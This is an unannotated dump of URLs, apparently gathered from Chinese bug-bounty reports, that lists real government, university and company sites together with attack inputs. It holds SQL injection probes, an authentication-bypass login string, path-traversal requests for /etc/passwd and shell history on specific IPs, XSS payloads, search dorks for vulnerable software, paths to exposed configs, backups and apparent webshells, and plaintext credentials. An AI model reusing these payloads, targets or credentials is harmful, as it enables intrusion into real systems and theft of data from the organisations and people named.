https://github.com/pyfxl/fxldoc/blob/master/IFCA/IFCA.txt http://114.129.36.133/ http://10.122.10.232:5555/ https://mail.ifca.com.cn/owa http://10.199.201.114/xswy/ http://rhdc.htagri.gov.cn/REProbeWebForms/webLogin.aspx google:inurl:out.do?viewType= inurl:manager.do?viewType= http://www.hljtyu.com/manager.do?viewType=newsdetail&flowsort=0523201493834710AM100%27%20and%20%271%27=%271 http://www.hljtyu.com/manager.do?viewType=newsdetail&flowsort=0523201493834710AM100%27%20and%20%271%27=%272 http://www.tls.gov.cn/manager.do?viewType=newsdetail&flowsort=115201441826780PM100 http://60.15.40.131/manager.do?viewType=newsdetail&flowsort=0242013105156890AM100 http://www.55577719.com/manager.do?viewType=newsdetail&flowsort=0242015121410527PM100 http://www.sr985.com/manager.do?viewType=newsdetail&bb=%D5%FE%B8%AE%B0%E6&flowsort=201501071150170172015115017670AM100 http://www.hljtyu.com/manager.do?viewType=newsdetail&flowsort=06162014101228137AM100 http://cnrunet.com/out.do?viewType=content&wordfileid=20131203175805123201355805377PM1 http://www.hrbcdc.com/out.do?viewType=wzlist&first=%BC%BC%CA%F5%B7%FE%CE%F1&second=%BD%A1%BF%B5%CC%E5%BC%EC%27 http://dep.mnnu.edu.cn/dx/shownews.asp?id=399 http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085&num=6 http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085%29%20order%20by%208%23&num=6 http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085%29%20%26%26%20version%28%29%20%3E5%23&num=6 http://guba.sina.com.cn/api/?s=recommend&a=recommendUser&exclude_uids=1561133085%29%20%26%26%20version%28%29%20%3C5%23&num=6 http://nms.qq.gamegon.com/ http://www.gla.uestc.edu.cn/phpmyadmin/ http://www.lzzl.gov.cn/CJB/templet/allinfo.asp?class_id=113&offset=-1 http://www.lzzl.gov.cn/CJB/ly2.asp http://**.**.**/queryVehVio.do_ https://vpn1.sinochem.com/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 http://wooyun.org/bugs/wooyun-2015-0103500 
http://101.227.244.20/shixibao/ucenter/admin.php?m=user&a=login&iframe=&sid= https://220.168.67.186/ https://220.168.136.137/ https://220.168.151.26/ https://220.168.151.20/ https://220.168.151.41/ https://220.168.151.49/ https://220.168.151.91/ https://220.168.151.64/ https://220.168.151.55/ https://220.168.151.103/ https://220.168.151.192/ https://220.168.152.12/ https://220.168.202.140/ https://220.169.92.225/ https://220.169.131.184/ https://220.169.132.99/ https://220.169.140.92/ https://220.169.134.144/ https://220.169.147.125/ https://220.169.138.119/ https://220.169.136.94/ https://220.169.160.108/ https://220.169.162.99/ https://220.169.167.38/ https://220.169.174.72/ https://220.169.172.98/ https://220.169.174.81/ https://220.169.178.109/ https://220.169.179.171/ https://220.169.186.153/ https://220.169.195.48/ https://220.169.196.167/ https://220.169.195.247/ https://220.169.199.155/ https://220.169.199.254/ https://220.169.206.141/ https://220.169.229.205/ https://220.169.229.207/ https://220.169.229.209/ https://220.169.229.204/ https://220.169.229.206/ https://220.169.229.203/ https://220.169.229.208/ https://220.169.167.132/ https://220.170.15.247/ https://220.170.48.79/ https://220.170.48.219/ https://220.170.53.225/ https://220.170.57.10/ https://220.170.61.50/ https://220.170.69.54/ https://220.170.89.86/ https://220.170.89.91/ https://220.170.89.82/ https://220.170.89.96/ https://220.170.89.81/ https://220.170.89.83/ https://220.170.89.84/ https://220.170.89.93/ https://220.170.89.88/ https://220.170.97.34/ https://220.170.100.247/ https://220.170.102.201/ https://220.170.110.1/ https://220.170.110.66/ https://220.170.111.40/ https://220.170.114.130/ https://220.170.120.198/ https://220.170.127.187/ https://220.170.130.172/ https://220.170.131.186/ https://220.170.131.162/ https://220.170.139.60/ https://220.170.140.20/ https://220.170.136.31/ https://220.170.145.167/ https://220.170.147.61/ https://220.170.147.239/ https://220.170.146.19/ 
https://220.170.155.32/ https://220.170.155.74/ https://220.170.155.77/ https://220.170.155.31/ https://220.170.156.124/ https://220.170.156.37/ https://220.170.157.125/ https://220.170.157.191/ https://220.170.158.155/ https://220.170.158.254/ https://220.170.160.110/ https://220.170.185.187/ https://220.170.190.246/ https://220.170.202.227/ https://220.170.213.150/ https://220.170.212.24/ https://220.170.213.43/ https://220.170.213.157/ https://220.170.215.171/ https://220.170.222.126/ https://220.170.232.192/ https://220.170.235.4/ https://218.104.157.158/ https://ssl-vpn-ct.dykmc.com.cn/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 https://biz.vvipone.com/v/employee/importResult?batchId=1 http://www.alibaba.com/product-detail/t-onmouseover-alert-xss-a-_50005365356.html http://www.alibaba.com/product-detail/-img-src-x-onerror-prompt_50013334152.html http://www.alibaba.com/product-detail/-img-src-x-onerror-alert_50013286203.html http://www.alibaba.com/product-detail/-img-src-x-onerror-prompt_50005251354.html http://www.alibaba.com/product-detail/t-onmouseover-alert-xjjjjss-a-_50005299834.html http://www.haizhebar.com/subject.php?id=105 http://cloud.189.cn/resource.action http://cloud.189.cn/v2/putIntoRecyclebin.action?fileIdList=314971291466219&noCache=0.28918433492071927 http://rencai.chinawater.net.cn/rencai/manage/user.asp?id=10195 http://rencai.chinawater.net.cn/rencai/manage/user.asp?id=17108 http://ctlabs.189.cn/Admin/Columns/FlowNodeSettingR4.aspx http://www.hahb.lss.gov.cn/cx/ylcx.aspx http://www.xiangshe.com/user/pwdreset.do?getpwdtype=1&code=77711&userid=****** http://61.156.25.91/LycucPay/Pay.aspx?corpID=3 inurl:jj.php?id= http://www.gm-pipefittings.com/jj.php?id=3 http://www.ykcxkj.com/jj.php?id=2 http://www.mhxinli.com/jj.php?id=2 http://www.ykyunhai.com/jj.php?id=3 http://www.yksxssz.com/xslh/jj.php?id=5 http://**.**.**/print_user.aspid=26745_ http://www.gzsdpf.org.cn/admin/OA/addinfo.php http://www.gzsdpf.org.cn/upfiles/files/gdffgd.php 
http://www.bio.whu.edu.cn/bkjx http://www.bio.whu.edu.cn/bkjx/ReadMe.txt http://www.bio.whu.edu.cn/db/%23data.asa http://www.bio.whu.edu.cn/sql.asp http://www.examiner.com.tw/examNews_detail.php?id=2808 http://www.examiner.com.tw/aboutUs.php?id=1 http://down.chinaz.com/soft/28252.htm inurl:line_list.asp?sid= http://www.czdfgl.com/line_list.asp?sid=2 http://6028808.net/line_list.asp?sid=3 http://www.tcxzh.com/line_list.asp?sid=6 http://www.fortour.cn/line_list.asp?sid=3 http://www.jymjly.com/line_list.asp?sid=6 http://www.66lxs.com/line_list.asp?sid=7 http://office.mingyi.com.cn/txl/manage/login.aspx http://office.mingyi.com.cn/txl/manage/Manage_list.aspx inurl:EduPlate/GoodoBlog http://www.goodo.com.cn/ http://down.chinaz.com/soft/28252.htm inurl:line.asp?id= http://www.tcxzh.com/line.asp?id=2 http://6028808.net/line.asp?id=75 http://www.zalvyou.com/line.asp?id=93 http://www.zfltour.com/line.asp?Id=223 http://www.7yoyo.cn/line.asp?id=1709 inurl:EduPlate/GoodoBlog http://www.goodo.com.cn/ http://www.jeecms.com/ http://www.jeecms.com/demo.jhtml http://demo3.jeecms.com,登录上提供的用户名和密码 https://nbp.szzfgjj.com/PTL010.revou?voureprintno=10708648 www.js.lss.gov.cn http://www.js.lss.gov.cn http://www.ujinbi.com/order.aspx/Success/2646565 http://www.ujinbi.com/order.aspx/Success/2646565 http://www.ujinbi.com/order.aspx/Success/2646563 http://www.ujinbi.com/order.aspx/Success/2646562 http://service.chinaums.com登陆处可爆破,直接进官网。。。 http://www.sxdpf.org.cn/info/info_info.aspx http://fgj.songjiang.gov.cn:8083/V4/login/logon.action http://gzf.songjiang.gov.cn:8081/Download.aspx?path=web.config http://fgj.songjiang.gov.cn:8083/V4/login/logon.action http://fgj.songjiang.gov.cn:8083/V4/login/logon.action http://61.152.219.206:8083/V4/wootest.jsp http://gzf.songjiang.gov.cn:8081/Download.aspx?path=web.config http://www.xznsyh.com/list.php?cid=212 www.txwl.cn http://www.zrh.zhenro.com/manage/login.aspx http://www.thaihot.com.cn/manage/login.aspx http://www.chinawuyi.com.cn/manage/login.aspx 
http://www.show-park.com/manage/login.aspx http://www.hengyugroup.com.cn/manage/login.aspx http://www.fjjinuo.com/manage/login.aspx http://www.xl-group.com.cn/manage/login.aspx http://www.wan.gov.cn/manage/login.aspx http://www.junshan.cc/manage/login.aspx Pamareter:TaskID http://zgp.njutcm.edu.cn/OpenTimsUI/AddOpenBook/AddXM_ExpOpCodeidlabtime.aspx?TaskID=1&type=stu http://202.192.18.141/OpenTimsUI/AddOpenBook/AddXM_ExpOpCodeidlabtime.aspx?TaskID=1&type=stu http://jwmis.hnie.edu.cn/sysgl/OpenTimsUI/AddOpenBook/AddXM_ExpOpCodeidlabtime.aspx?TaskID=1&type=stu http://www.gyu.cn:9100/OpenTimsUI/AddOpenBook/AddXM_ExpOpCodeidlabtime.aspx?TaskID=1&type=stu http://www.hnrku.net.cn:8003/OpenTimsUI/AddOpenBook/AddXM_ExpOpCodeidlabtime.aspx?TaskID=1&type=stu http://www.santang.com.cn/GcList.aspx?BigClassId=157&SmallClassId=158&KeyWord=&Page=1 inurl:EduPlate\RES\ inurl:RESWEB/ResWebResDetaile.aspx http://121.18.89.108/workplate/comm/xzsp/form/aspxforms/fzlist.aspx http://www.lxxzfwzx.com/workplate/comm/xzsp/form/aspxforms/fzlist.aspx http://www.wdxxzfwzx.com/workplate/comm/xzsp/form/aspxforms/fzlist.aspx http://www.gbdqyw.com/workplate/comm/xzsp/form/aspxforms/fzlist.aspx http://www.bdxzfw.cn/workplate/comm/xzsp/form/aspxforms/fzlist.aspx http://www.rzfwzx.gov.cn/workplate/comm/xzsp/form/aspxforms/fzlist.aspx http://121.18.89.108/workplate/comm/attachment/list.aspx http://www.lxxzfwzx.com/workplate/comm/attachment/list.aspx http://www.wdxxzfwzx.com/workplate/comm/attachment/list.aspx http://www.gbdqyw.com/workplate/comm/attachment/list.aspx http://www.bdxzfw.cn/workplate/comm/attachment/list.aspx http://www.rzfwzx.gov.cn/workplate/comm/attachment/list.aspx http://www.santang.com.cn/ http://zgp.njutcm.edu.cn/OpenTimsUI/STUMODEL/StuBookExpCell.aspx?codeID=1 http://expteach.gzhu.edu.cn/OpenTimsUI/STUMODEL/StuBookExpCell.aspx?codeID=1 http://jwmis.hnie.edu.cn/sysgl/OpenTimsUI/STUMODEL/StuBookExpCell.aspx?codeID=1 
http://www.gyu.cn:9100/OpenTimsUI/STUMODEL/StuBookExpCell.aspx?codeID=1 http://www.hnrku.net.cn:8003/OpenTimsUI/STUMODEL/StuBookExpCell.aspx?codeID=1 inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp http://hw.gpsisp.com/ http://gps1.gps188.com/gps/doif/myLogin.jsp http://gps2.gps188.com/gps/doif/myLogin.jsp username:admin'or'admin'='admin password:123456 http://admin.iwo.kazhu365.com/account/login http://114.247.0.113/ http://ic.szyqwz.com/cjcx/xuesheng/czjl/shuru.asp?id=1&xueke=a http://yyzx.ijd.cn/cjcx/xuesheng/czjl/shuru.asp?id=1&xueke=a http://218.78.241.94/cjcx/xuesheng/czjl/shuru.asp?id=1&xueke=a http://exam.fdfz.cn/cjcx/xuesheng/czjl/shuru.asp?id=1&xueke=a http://www.wzew.cn/cjcx/xuesheng/czjl/shuru.asp?id=1&xueke=a http://www.newclasses.org/2013ZYT/school_detail.aspx?schoolid=1 www.newclasses.org http://hnair.travelsky.com/huet/bc10/login.jsp登陆处可爆破 http://www.orico.com.cn/DriverDownload.html。 http://www.xmblxx.com/network!more.do?keytype=1&btnSubmitt=test&netkeywords=test http://www.xmxdzx.com/network!more.do?keytype=1&btnSubmitt=test&netkeywords=test http://www.sssmfx.com/network!more.do?keytype=1&btnSubmitt=test&netkeywords=test http://220.160.119.36/network!more.do?keytype=1&btnSubmitt=test&netkeywords=test http://xmxayz.com/network!more.do?keytype=1&btnSubmitt=test&netkeywords=test http://passport.chuanke.com/api/quicklogin http://www.zcqczz.com/payorder.php?xid=4081&xbusid=59 http://im.wo.com.cn/webportal//loginSp/userLogin.action http://www.hsypjg.net/login.action http://pages.chinahr.com/2012/bj/sdic_0531/jobs.asp?orgid=200309120019360005 http://pages.chinahr.com/2012/bj/sdic_0531/jobs.asp?orgid=200309120019360005’ font-size:9pt;background-color:#ddffff;padding-left:5px;display:none http://sxyjxjy.gxu.edu.cn/login.action http://www.hbtcw.com.cn/lbqs/bpm/printdccontract.aspx?bid=69&id=109 http://www.hbtcw.com.cn/lbqs/bpm/printdccontract.aspx?bid=69&id=8090 http://pmt.koukao.cn/news/getPublicExaminee.do 
https://vpn.dykmc.com.cn/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 http://app.quyiyuan.com:8888/APP/user/action/DataValidationActionC.jspx?_dc=1427911798753&hospitalId=&PHONE_NUMBER=手机号&modId=10001&messageType=3&op=sendRegCheckCodeActionC&loc=c&isLogin=false&hospitalID=&opVersion=1.1.80&operateUserSource=0&page=1&start=0&limit=25 http://app.quyiyuan.com:8888/APP/user/action/LoginAction.jspx?_dc=1427912093395&postdata=%7B%22PHONE_NUMBER%22%3A%2213113046783%22%2C%22USER_ID%22%3Anull%2C%22PASSWORD%22%3A%2257663e2b1322be262c4861c1af2eef98775fcd1751d14b8041dfeedf14b596f69219cd6ca2a85b71cdccc626ebe2ddc9ad7979d4eca0f6c3d6014f883223ea2a%22%2C%22ConfirmPASSWORD%22%3Anull%2C%22EMAIL%22%3Anull%2C%22NAME%22%3Anull%2C%22BIRTHDAY%22%3Anull%2C%22REGISTER_DATE%22%3Anull%2C%22REMARK%22%3Anull%2C%22SEX%22%3Anull%2C%22MEDICAL_GUIDE%22%3Anull%2C%22USER_SOURCE%22%3A%220%22%2C%22OPEN_ID%22%3Anull%2C%22PUBLIC_SERVICE_TYPE%22%3Anull%2C%22id%22%3A%22ext-record-78%22%2C%22USER_CODE%22%3A%2213113046783%22%7D&op=register&loc=c&isLogin=false&hospitalID=&opVersion=1.1.80&operateUserSource=0&page=1&start=0&limit=25 http://app.quyiyuan.com:8888/APP/user/action/LoginAction.jspx?_dc=1427912649826&userId=1200&op=queryUserInfo&isLogin=true&hospitalID=10778&opVersion=1.1.80&operateCurrent_UserId=1&operateUserSource=0&page=1&start=0&limit=25 
http://app.quyiyuan.com:8888/APP/user/action/LoginAction.jspx?_dc=1427913109821&postdata=%7B%22ID_NO%22%3A%****************%22%2C%22USER_ID%22%3A%22124013%22%2C%22PASSWORD%22%3Anull%2C%22ConfirmPASSWORD%22%3Anull%2C%22EMAIL%22%3Anull%2C%22NAME%22%3A%22%5Cu5929%5Cu671d2%22%2C%22USER_CODE%22%3Anull%2C%22PHONE_NUMBER%22%3A%2213113046783%22%2C%22CARD_NO%22%3A%22Q150402000%22%2C%22BIRTHDAY%22%3A%221977-11-13%22%2C%22REGISTER_DATE%22%3Anull%2C%22SEX%22%3A%221%22%2C%22id%22%3A%22ext-record-401%22%7D&cardNo=Q150402000&userVsId=169139&op=updateuser&loc=c&isLogin=true&hospitalID=10778&opVersion=1.1.80&operateCurrent_UserId=124009&operateUserSource=0&page=1&start=0&limit=25 http://www.zara.cn/cn/ https://222.33.68.95/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 http://202.111.148.109/system/login.action http://gs.njfu.edu.cn/ http://202.203.225.17:8080/ http://218.75.27.177/ http://yjsy.wmu.edu.cn:8080/ http://101.76.99.20/ http://61.187.179.68:8080/ http://yjsy.wzmc.edu.cn:8080/ http://210.43.126.80:8080/ http://211.64.205.214/ http://www.wooyun.org/bugs/wooyun-2015-0100837_ x.php/Liuyan/show***** http://www.tass.com.cn/wwwroot.rar http://211.160.9.96:8080/ http://222.223.193.93:808/framework/Login.aspx http://e.youku.com/classify/getresource?callback=jsonp2&cid=325&_=1427920191195 http://219.232.200.42/yjrc/err/timeout.jsp http://219.232.200.42/?formAction=in&objName=AWorkInfo&operType=update&id=****** http://219.232.200.42/yjrc/person/PueryEduResumAction.do?formAction=in&applyId=******* http://yuehui.163.com/存在两处csrf导致可以刷粉等问题,一处是在关注处,另一处是在好感处 http://140.206.74.65:8888这个系统 http://140.206.74.65:8888/dn/tools/TerminalCommunicationServiceController.aspx可以未授权访问,可以重启终端等 http://www.hsypjg.net/reindex.action www.xxsjsw.gov.cn/henan/ZiXunDetail.aspx?id=10551 http://114.251.243.18/hhzp/resume.action http://www.bmc-medical.com/news_list/newsCategoryId=8.html http://www.shaolinbus.com/jjfa/&newsCategoryId=17.html http://www.lomon.com/product_sale/&newsCategoryId=21.html 
http://www.invenlux.com/news_list/&newsCategoryId=2.html inurl:newsCategoryId http://weixin.mangocity.com/index.php http://image.sogou.com/pics/news/detail_top.jsp?category=%E5%A8%B1%E4%B9%90&did=8&mark=1b87c65ad5f5ada2 http://175.102.14.72/vmain/login.jsp http://175.102.14.72/ServiceAction/com.velcro.base.DataAction?sql= http://175.102.14.72/ServiceAction/com.velcro.base.DataAction?sql= https://github.com/sjqzhang/stock/blob/0e6c477e9b33fb35deb5051de0345c624b462d5b/web/application/config/config.php http://mail.topsec.com.cn:8888/login.php http://mail.topsec.com.cn:8888/login_check.php http://mail.topsec.com.cn:8888/logout.php http://mail.topsec.com.cn:8888/redirect.php http://love.xdkb.net/admin/ http://wedexpo.xdkb.net/admin/Login.aspx http://ntzx.cn/home.php?action=article&id=1 http://video.nxtv.cn http://wts.dealer.easypass.cn/100000237/Ajax/GetNewsResidueDay?newsids=23999791 http://huawei-u8861-shuajibao.shuajizhijia.net http://sms.goldia.cn/sp/index_mo.asp?Mobile=13888888888 http://sms.goldia.cn/sp/index_mo.asp?Mobile=13888888888 http://qugou-inc.com/qugou/admin#thread_admin http://demo.guqiu.com/ http://demo.guqiu.com/admin/main.aspx http://demo.guqiu.com/admin/userpwd.aspx http://218.6.147.143:7000/course/jxsbazgfjbzjc/admin/main.aspx http://h5.hejian.com/api/virtual/?tag_id=91 http://cms.hejian.com/后台弱口令, http://www.mellowtour.com.tw/webobj/NewPost/ShowPost.asp?id_no=9768&postClass=1 http://drugs.medlive.cn/drugref/drugref/index.do http://drugs.medlive.cn/drugref/drugref/drug_info_search.do http://drugs.medlive.cn/drugref/drug_info_search.do http://drugs.medlive.cn/drugref/drugref/drugCheckIndex.do http://drugs.medlive.cn/drugref/drugref/drugCateIndex.do http://drugs.medlive.cn/drugref/drugref/instruction_search_init.do http://app.dejiplaza.com:1020/ http://www.qzwsw.com//Foosun_Data/FS400.mdb http://218.80.239.62:7001/defaultroot/login.jsp http://xh.cast.org.cn/cast/index/index.jsp http://210.14.113.22:8090/AQMIS/main/login.jsp网站进行验证。 system:type%3DServer 
system:type%3DServerInfo http://210.14.113.22:8090/shell/nice.jsp www.axgaj.gov.cn/admin/ www.axgaj.gov.cn/Login.aspx inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp http://202.104.30.186:80/ inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp http://www.sippr.org.cn/index.php/Home/Active/member_login http://www.sippr.org.cn/index.php/Home/Active/login https://jpaas-edu.baidu.com/ http://www.gaggzy.com/Jyweb/XXGKList.aspx?Type=信息公开&SubType=20 http://www.gaggzy.com/TrueLoreAjax/TrueLore.Web.WebUI.WebAjaxService,TrueLore.Web.WebUI.ashx Ajax-method:GetPageXXGK http://sangfor.360help.com.cn/ http://223.82.246.235:8080/mms/listMember.action http://223.82.246.235:8080/mms/listMember.action http://223.82.246.235:8080/caidao.jsp vasp:MM7Config xmlns:vasp="http://mms.chinamobile.com/mm7ConfigSchema vasp:MM7Config http://www.228.com.cn/ http://lib.uibe.edu.cn/tsg/AdvicesBaseView.aspx http://www.airfex.net/cn_asp/news_show.asp?id=885 http://dfi.bnuz.edu.cn/college/article.php?id=44 http://dfi.bnuz.edu.cn/college/article.php?id=44 http://dfi.bnuz.edu.cn/college/article.php?id=44 http://ipccs7.call4006.cn http://zxzj.sheitc.gov.cn/ http://www.zjedu.org www.zjedu.org http://gaofengsg.gotoip3.com/news_display.php?id=9 http://xsgzb.sdkd.net.cn/ziqige/admin/ http://xsgzb.sdkd.net.cn/ziqige/upfile.asp http://xsgzb.sdkd.net.cn/ziqige/c.asp http://xsgzb.sdkd.net.cn/ziqige/Admin_Login.asp http://www.cqkcy.com/product_content.php?cid=295&id=2553 http://www.cqkcy.com/test.php inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp www.cspro.org)了一个路人账号操作。 inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp http://www.yishion.com.cn/blog/bw8/201503223613/fan.php http://yd.zjjgs.gov.cn/ http://sz.zjjgs.gov.cn/Admin/Admin_Login.asp http://enterprise.zteusa.com http://www.nthdglc.com/t.asp?id=954 http://www.sdtvu.com.cn/jcms 
http://www.sdtvu.com.cn/jcms/interface/user/out_userinfo.jsp?xmlinfo=%3Cmain%3E%3Cstatus%3EQ%3C/status%3E%3C/main%3E http://hljxfxh.xicp.net:8090/login.action http://hljxfxh.xicp.net:8090/web/login.action http://www.jsgjj.cn http://vpn.bilibili.co:3000/ admin:admin inurl:index.php?sid= http://www.ykytsh.com/cp/index.php?sid=6 http://www.skodayk.com/cxzl/index.php?sid=9 http://www.ykwtdz.com/cp/index.php?sid=7 http://www.edwardlogcabin.com/index.php?sid=28 http://yktljc.com/cp/index.php?sid=4 inurl:cpzs.php?uid= http://www.ykbzj.com/cpzs.php?uid=4 http://www.yksyj.com/cpzs.php?uid=2 http://www.htzgcb.com/cpzs.php?sid=7 http://www.xpgkjs.com/cpzs.php?uid=7 http://www.ykjgdq.com/cpzs.php?uid=2 http://www.ykfhgk.com/cpzs.php?uid=4 http://www.seeyon.com/.htaccess http://www.seeyon.com/phpinfo.php http://www.seeyon.com/inc/db.php http://www.foshandb.com/newAngelOnline.rar http://www.vans-china.cn http://124.238.218.78用户名密码相通 http://www.vans-china.cn上面也能登录成功 http://www.vans-china.cn/report/spxxcxlb.jsp www.vans-china.cn http://220.180.89.90:8081/userlogin.aspx http://www.zixilib.com:8008/userlogin.aspx http://dydl.sddylib.com/userlogin.aspx http://ggg.360elib.com/userlogin.aspx http://221.1.218.166:81/userlogin.aspx http://co.dichuang.cc:85/userlogin.aspx http://218.23.126.222:999/userlogin.aspx http://60.170.103.21:81/userlogin.aspx http://zslib.org:8000/userlogin.aspx http://211.141.185.166:82/userlogin.aspx http://www.tsqtsg.cn:88/userlogin.aspx http://book.gyxtsg.org/userlogin.aspx http://120.194.7.10:8087/userlogin.aspx http://www.zixilib.com:8008/userlogin.aspx http://co.dichuang.cc:85/userlogin.aspx http://220.180.89.90:8081/userlogin.aspx http://www.tlzxx.net/tushu/userlogin.aspx http://www.tsqtsg.cn:88/userlogin.aspx http://120.194.7.10:8087/userlogin.aspx http://dealer.xcar.com.cn/newcar/admin_dealer2/sys_login.php http://kq.gxmu.edu.cn inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp 
http://www.wooyun.org/bugs/wooyun-2010-0105508/trace/9c949f564ded401dd228377c516ce91e http://www.jxutcm.edu.cn/ http://www.bbepb.gov.cn/HPSP1Show.aspx?CaseNo=29243998-bf6f-4ca3-8f31-7b99ee7a6cfa&type=0&InstanceId=2a25b828-37e7-4125-b9f1-ff0cef0f5bd5 http://www.hbsyrss.gov.cn mail:jingwulianbo@qq.com pass:777777777 www.gdzs.gov.cn www.wooyun.org时 ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.example.com/;IP=1;IPNum=1 www.wooyun.org来绕过限制。 http://www.ciscn.cn/optUserInfo.action?opt=read&read=1&usercode=admin http://www.ciscn.cn/optUserInfo.action?opt=read&read=1&usercode=mowenwen http://www.ciscn.cn/optUserInfo.action?opt=edit&read=1&usercode=admin http://www.ciscn.cn/readTeamInfo.action?opt=index&teamid=12471 http://www.manzuo.com/qa/my http://www.jxkx.gov.cn/san.asp?id=13940 http://test.pipi.cn/WEB-INF/web.xml http://61.153.183.57:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://61.153.183.42:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://60.12.104.175:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://122.225.105.120:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://61.153.183.57:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/proc/self/environ http://61.153.183.57:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/.bash_history http://61.153.183.57:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/webservice/webdoc/pipi.cn/pipi_log_data/bin/ztool.db.properties http://www.qdkaiyuangroup.com/login.jsp inurl:IneduPortal/index.aspx http://www.yuysoft.com/index.asp http://cfsc.com.cn/expertQa.do?method=searchAllQuerstions&checkType=1&keyWord= https://218.57.138.29/por/login_psw.csp https://218.57.138.157/portal_default/index1.html http://60.28.57.20/admin http://setting.medlive.cn 
http://www.droidsec.cn/%E8%AF%A6%E8%A7%A3android-app-allowbackup%E9%85%8D%E7%BD%AE%E5%B8%A6%E6%9D%A5%E7%9A%84%E9%A3%8E%E9%99%A9/ http://211.147.135.121:8086 http://b.medlive.cn http://xdjy.cumtb.edu.cn/cjwt/shownews.php?lang=cn&id=37 http://hnhp6660201.w215.bizcn.com/news_content.asp?ID=19 http://www.eccn.com/3d/xw.txt http://211.149.173.188:7003/system/login http://119.254.70.101:8000/homelinkcb http://bfz.medlive.cn http://wooyun.org/bugs/wooyun-2015-0105083 http://le.medlive.cn/ https://pbnj.ebank.cmbchina.com http://bj.esf.sina.com.cn/ http://broker2.esf.leju.com/login?client_citycode=bj http://broker2.esf.leju.com/todayusestat/port?agentid=8116554可下架房源操作 http://bj.esf.sina.com.cn/agent/这个接口可以查看在新浪乐居上所有经纪人的信息 http://bj.esf.sina.com.cn/agentshop/8071976-2 http://broker2.esf.leju.com/todayusestat/port?agentid=8071976(上面她的id替换到这里) https://member.feiniu.com//addrlist/doModifyMem?cguid=23D06B1F-B20B-9302-7717-671934CEDC3A&username=%E6%B5%8B%E8%AF%95&mlsa01=1&mlsa02=1&mlsa03=310105&userzipcode=310105&userprovince=%E4%B8%8A%E6%B5%B7&usercity=%E4%B8%8A%E6%B5%B7%E5%B8%82&usercounty=%E9%95%BF%E5%AE%81%E5%8C%BA&csrf_token_uitox_member=&useraddr=%E6%88%91%E4%B9%9F%E4%B8%8D%E7%9F%A5%E9%81%93%E5%9C%A8%E5%93%AA%E9%87%8C11&usercell=18297557718&phoneSection=&usertel=&phoneExt= http://app.shenchuang.com http://app.shenchuang.com/info.php redis_version:2.6.12 os:Linux used_memory:856272 used_memory_human:836.20K used_memory_rss:1859584 used_memory_peak:954848 used_memory_peak_human:932.47K http://hz.gxgs.gov.cn hz.gxgs.gov.cn/jcms/interface/user/out_userinfo.jsp?xmlinfo=%3Cmain%3E%3Cstatus%3EQ%3C/status%3E%3C/main%3E http://bj.esf.sina.com.cn/ http://broker2.esf.leju.com/statnew/shopagent?excel=&currpage=&stattype=1&shopname=%C1%B4%BC%D2%B5%D8%B2%FA%B0%D7%D6%BD%B7%BB%B5%EAA%B5%EA%%27%20and%201=1%20and%20%27%%27=%27&startdate=2015-03-27&enddate=2015-04-02&page_limit=0%2C2000 
http://broker2.esf.leju.com/statnew/shopagent?excel=&currpage=&stattype=1&shopname=%C1%B4%BC%D2%B5%D8%B2%FA%B0%D7%D6%BD%B7%BB%B5%EAA%B5%EA%%27%20and%201=2%20and%20%27%%27=%27&startdate=2015-03-27&enddate=2015-04-02&page_limit=0%2C2000 http://58.61.28.60:8089 http://58.61.28.60:8089/jmx-console http://58.61.28.60:8089/download/ICDCONFIG/.svn/entries http://58.61.28.60:8089/file/.svn/entries http://58.61.28.60:8089/download/14401004.sql http://58.61.28.60:8089/download/14401003.sql http://growth.medlive.cn http://119.254.231.76/gjyl http://**.**.**/index.jspID_lanmu=1 http://psy.haut.edu.cn/Test/RPT_Result_Admin.aspx?ResultID=30023 http://broker2.esf.leju.com/statclick/refstat?curpage=&date=2015-04-01*&excel=0 https://m.coolyun.com/test-annotations/ http://widget.coolyun.com/widget.zip http://broker2.esf.leju.com/todayusestat/port?agentid=8116554 http://www.jstsks.com/index.shtml http://www.hntskh.com/index.shtml http://www.ahtsks.com/index.shtml http://www.sctzsbzy.com/default.shtml http://www.hntsks.com/index.shtml http://www.gztsks.com/index.shtml http://www.jltsks.com/index.shtml http://www.gxtsks.com/index.shtml http://124.117.254.130:7001/index.shtml http://www.hbtsks.com/index.shtml http://116.53.253.7/index.shtml http://218.21.128.211:7001/index.shtml http://jk.gsgj.com.cn/index.shtml http://www.hbtskh.com/index.shtml http://www.nxtsks.com/index.shtml http://bbs.5see.com/uc_server/data/config.inc.php.bak http://www.jjce.net http://www.sl88.net/about.asp?sid=6 http://www.sl88.net/products_contrast.asp?sid=67 http://www.sl88.net/news_list.asp?sid=5 http://www.sl88.net/news_list.asp?sid=5 http://www.sl88.net/manage/Edit/admin_login.asp http://www.sl88.net/pic/2015329162917143.asa http://si.cnc.cn si.cnc.cn/search.jsp si.cnc.cn/search.jsp http://oa.998.com/login/Login.jsp?logintype=1 http://221.131.9.125:8000/logoff_submit.do http://www.wuhufucai.cn/news.php?id=22 http://www.wuhufucai.cn/admin/Admin_Login.php http://www.wuhufucai.cn/news.php?id=22 
